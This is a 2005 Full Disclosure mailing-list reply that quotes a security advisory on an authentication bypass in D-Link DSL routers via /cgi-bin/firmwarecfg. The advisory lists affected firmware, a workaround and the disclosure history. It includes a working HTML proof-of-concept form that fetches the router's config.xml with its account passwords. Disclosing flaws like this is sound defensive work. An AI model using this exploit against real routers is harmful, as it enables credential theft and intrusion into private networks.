Full Disclosure mailing list archives
Re: D-Link DSL routers authentication bypass
From: Sebastian von Knorring <Sebastian.von.Knorring () iki fi>
Date: Fri, 20 May 2005 17:05:03 +0300 (EEST)
Hello. Could the D-Link DI-604 story at <http://groups-beta.google.com/group/sci.astro.seti/msg/71095063e414a3e2> be related to this vulnerability? I have myself also a DI-604 that broke down in exactly the same way as described above and the above was the only similar case I have yet found on the net. My suspicion was also that the box had been hacked and your vulnerability post now shows that exploitable holes in D-Link boxes exist. -Sebastian On Thu, 19 May 2005 16:41:56 +0200 Francesco Orro <francesco.orro () akhela com> wrote:
====================== SUMMARY ======================== Title: D-Link DSL routers authentication bypass Date: 19 May 2005 Author: Francesco Orro <francesco.orro 4t akhela.com> Product: DSL-502T, DSL-504T, DSL-562T, DSL-G604T Vendor: D-Link Vendor URL: http://www.dlink.com Vendor Status: D-Link was conctacted Affects: Tested on DSL-502T, DSL-504T, DSL-562T, DSL-G604T with various firmwares versions Risk: High Impact: Unauthorized people may gain full access to the device Vulnerability Description: an undocumented feature allows (in some cases) to bypass the authentication prompt and gain full access to the router, and than to the network behind it. ====================== BACKGROUND ======================== D-Link DSL routers are commonly used for internet connectivity for home or small office needs. (http://www.dlink.com/products/) =============== PROBLEM DESCRIPTION ================== The CGI /cgi-bin/firmwarecfg, when executed, checks the existence of the file fw_ip under /var/tmp/. If this file exists, all IP addresses listed inside it are given straight access to the device, without the need for authentication. If this file doesn't exists, the CGI creates a new one, putting the requesting address inside. If the web configuration console is accessible from internet and if nobody have never called the CGI before (es: from a workstation inside the LAN), then everybody can gain access to the router, download the config.xml file which contains users account and passwords, have access to the private network, modify or alter the firmware of the router, etc. ================ ADDITIONAL DETAILS ================== Vulnerability was found on the following firmware versions: V1.00B01T16.EN.20040211 V1.00B01T16.EU.20040217 V0.00B01T04.UK.20040220 V1.00B01T16.EN.20040226 V1.00B02T02.EU.20040610 V1.00B02T02.UK.20040618 V1.00B02T02.EU.20040729 V1.00B02T02.DE.20040813 V1.00B02T02.RU.20041014 Can be exploited by a simple HTTP POST with the form: <html> <head>Download config.xml:<title>GetConfig - Config file download</title></head> <body> <script lang="javascript"> function invia_richiesta() { document.DownloadConfig.action='http://'+document.InputBox.Host. value+'/cgi-bin/firmwarecfg'; document.DownloadConfig.submit(); } </script> <form name="InputBox"> <br>http://<input Name="Host" type="text" v value="">/cgi-bin/firmwarecfg<br> </form> <form name="DownloadConfig" method="POST" action="" enctype="multipart/form-data"> <input type="Submit" name="config" value="Download" onClick="javascript:invia_richiesta();"><br> </form> </body> </html> =================== FIX INFORMATION =================== Actually there is no solution to problem due to the fact that it seems an hidden feature. The work around is to call the CGI /cgi-bin/firmwarecfg from a known address of the local network and/or disable web console access from the internet. ================ AUTHOR INFORMATION ================ Francesco Orro Akhela S.r.l. - Operation Group http://www.akhela.com/ EMail: francesco.orro 4t akhela.com KeyID: 6CF46D45 =================== DISCLOSURE HISTORY ===================== 2 May 2005 - First private release of this advisory; 4 May 2005 - The vendor (D-Link Mediterraneo S.r.l.) has been informed of the vulnerability; 5 May 2005 - The vendor replid that the problem was resolved on firmware version V1.00B02T02.EU.20040610, but has been demostrated that this version is vulnerable too; 19 May 2005 - Public release of this advisory.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- D-Link DSL routers authentication bypass Francesco Orro (May 19)
- Re: D-Link DSL routers authentication bypass Luis Peralta (May 20)
- Re: [Bulk] Re: D-Link DSL routers authentication bypass Francesco Orro (May 20)
- Re: D-Link DSL routers authentication bypass Sebastian von Knorring (May 20)
- Re: D-Link DSL routers authentication bypass Luis Peralta (May 20)